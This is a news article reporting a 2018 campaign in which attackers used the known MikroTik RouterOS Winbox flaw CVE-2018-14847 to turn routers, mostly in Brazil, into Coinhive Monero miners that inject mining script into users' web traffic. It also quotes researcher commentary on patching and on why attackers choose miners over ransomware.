According to Trustwave researcher Simon Kenin, on July 31, a surge in Coinhive activity was detected which indicated that a malicious cryptocurrency mining operation was underway.
In a blog post, the researcher said that upon further examination, it appeared to be MikroTik devices that are involved.
Latvia-based MikroTik provides network equipment for customers worldwide, and in this campaign, Brazil is the main country which has been targeted.
It might have been a strange coincidence and nothing more than a set of compromises occurring at the same time, but Kenin noticed that all of the devices were using the same Coinhive sitekey.
Coinhive is legitimate software used, generally in-browser, by websites to borrow visitor CPU power temporarily in order to mine the virtual currency Monero. Widespread abuse of the script has led to many antivirus and cybersecurity solutions companies blocking the script.
If the same sitekey was in use, this indicates that all of the devices involved were mining for virtual gold on behalf of one controlling entity.
If both keys are the work of the same threat actor, this brings the count to roughly 200,000.
It took some digging by the researcher to find a link between the Coinhive activity spike and MikroTik. A router developed by the company was traced back to a compromise in a hospital in Brazil, and an individual having trouble with their own system posted on Reddit at roughly the same time in a bid to find help provided some clues.
The user in question said that every web page they visited injected the Coinhive code, and neither changing the DNS or removing the router helped.
“At this point, it’s worth noting that MikroTik routers are used by Internet providers and big organizations, and in this case, it seems that the Reddit post’s author’s ISP had their router compromised, same as the router of the hospital I mentioned earlier in the post,” the researcher said.
A tweet from MalwareHunter then provided a link.
The message mentioned a “mass exploitation” of MikroTik devices. However, the vulnerability which allowed the firm’s routers to become cryptocurrency mining slaves was no zero-day; instead, it is CVE-2018-14847, a known security bug impacting Winbox for MikroTik RouterOS.
Through version 6.42 of the software, remote attackers are able to bypass authentication and read arbitrary files by modifying a request to change one byte related to a Session ID, according to the vulnerability description.
The mass-exploit of these devices is not necessarily the vendor’s fault. The bug was patched within a day of discovery, but sadly, hundreds of thousands of devices have not been updated, leaving them vulnerable to exploit.
By utilizing the security flaw, the threat actor responsible for the campaign was able to compromise the routers to inject the Coinhive script into every web page visited by the user.
It is not known who is behind the campaign, but Kenin believes that “the attacker is clearly showing a high level of understanding of how these MikroTik routers work.”
This campaign is yet another example of what can happen on a vast scale should individual devices not receive security updates.
In the same way that the Mirai IoT botnet was able to wreck devastation due to unsecured, consumer home devices, the individual security of our devices needs to be taken more seriously.
“Ransomware awareness has increased significantly so, in many cases, even if an attacker manages to encrypt files users these days have backups,” the researcher added. “This means that they don’t pay the ransom as frequently as they used to. Miners, on the other hand, can be a lot more stealthy, so while a single computer would yield more money from ransomware if the user ends up paying, an attacker would prefer to run a stealthy miner for a longer period of time.”